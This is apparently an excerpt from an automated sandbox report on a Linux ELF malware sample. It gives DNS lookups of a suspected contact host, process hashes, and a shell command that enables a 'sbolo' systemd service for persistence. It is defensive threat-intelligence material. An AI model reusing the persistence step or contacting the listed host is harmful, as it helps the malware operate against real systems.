                              Oct 7, 2024 16:26:02.648025036 CEST8.8.8.8192.168.2.130x81dNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:04.201644897 CEST1.1.1.1192.168.2.130x787aNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:04.201644897 CEST1.1.1.1192.168.2.130x787aNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:12.345773935 CEST8.8.8.8192.168.2.130x5f02No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:19.438148975 CEST8.8.8.8192.168.2.130x7925No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:29.067174911 CEST8.8.8.8192.168.2.130xcd0dNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:39.698496103 CEST8.8.8.8192.168.2.130xb1dcNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:46.285931110 CEST8.8.8.8192.168.2.130x6625No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:48.942029953 CEST8.8.8.8192.168.2.130x3c47No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false

                              System Behavior

                              Start time (UTC):14:23:17
                              Start date (UTC):07/10/2024
                              Path:/tmp/na.elf
                              Arguments:/tmp/na.elf
                              File size:149016 bytes
                              MD5 hash:535cff3a16d579f89346b0916110d25e

                              Start time (UTC):14:23:17
                              Start date (UTC):07/10/2024
                              Path:/tmp/na.elf
                              Arguments:-
                              File size:149016 bytes
                              MD5 hash:535cff3a16d579f89346b0916110d25e

                              Start time (UTC):14:23:17
                              Start date (UTC):07/10/2024
                              Path:/tmp/na.elf
                              Arguments:-
                              File size:149016 bytes
                              MD5 hash:535cff3a16d579f89346b0916110d25e

                              Start time (UTC):14:23:17
                              Start date (UTC):07/10/2024
                              Path:/bin/sh
                              Arguments:sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):14:23:17
                              Start date (UTC):07/10/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):14:23:17
                              Start date (UTC):07/10/2024
                              Path:/usr/bin/systemctl
                              Arguments:systemctl enable sbolo.service
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):14:23:18
                              Start date (UTC):07/10/2024
                              Path:/tmp/na.elf
                              Arguments:-
                              File size:149016 bytes
                              MD5 hash:535cff3a16d579f89346b0916110d25e

                              Start time (UTC):14:23:18
                              Start date (UTC):07/10/2024
                              Path:/usr/lib/systemd/systemd
                              Arguments:-
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Start time (UTC):14:23:18
                              Start date (UTC):07/10/2024
                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File size:22760 bytes
                              MD5 hash:3633b075f40283ec938a2a6a89671b0e